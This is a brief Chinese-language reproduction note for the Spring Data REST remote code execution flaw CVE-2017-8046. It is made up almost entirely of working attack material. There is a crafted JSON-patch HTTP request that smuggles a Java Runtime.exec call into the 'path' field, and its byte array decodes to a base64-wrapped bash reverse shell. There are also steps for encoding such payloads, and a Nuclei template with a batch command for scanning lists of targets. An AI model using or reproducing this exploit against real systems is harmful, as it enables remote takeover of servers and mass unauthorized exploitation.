漏洞复现 CVE-2017-8046 Spring Data Rest RCE

1.反弹shell的payload需要bash64加解密，网址：https://ir0ny.top/pentest/reverse-encoder-shell.html2.base64加解密后，需要转为ASCII10进制，用小葵字典转换即可3.payloadPATCH /customers/1 HTTP/1.1Host: x.x.x.x:8080Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/json-patch+jsonContent-Length: 460[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{98,97,115,104,32,45,99,32,123,101,99,104,111,44,89,109,70,122,97,67,65,116,97,82,62,42,74,102,65,118,90,72,86,50,76,51,82,106,99,67,56,120,79,84,73,117,77,84,89,52,76,106,77,120,76,106,99,121,76,122,92,51,78,122,92,103,77,68,52,109,77,81,61,61,125,124,123,98,97,115,101,54,52,44,45,100,125,124,123,98,97,115,104,44,45,105,125}))/lastname", "value": "vulhub" }]

批量验证命令：nuclei.exe -t CVE-2017-8046.yaml -l subs.txtyaml POC：id: CVE-2017-8046info:  name: Spring Data Rest RCE  author: sm  severity: critical  description: |    Malicious PATCH requests submitted to servers using Spring Data REST backed HTTP resources can use specially crafted JSON data to run arbitrary Java code.  reference:    - https://tanzu.vmware.com/security/cve-2017-8046  classification:    cve-id: CVE-2017-8046  tags: cverequests:  - raw:      - |        PATCH /customers/1 HTTP/1.1        Host: {{Hostname}}        Accept-Encoding: gzip, deflate        Accept: */*        Accept-Language: en        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)        Connection: close        Content-Type: application/json-patch+json        Content-Length: 142        [{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{108,115}))/lastname", "value": "ry" }]    matchers:      - type: word        words:          - "status_code_1==400"          - "cause"          - "message"        condition: and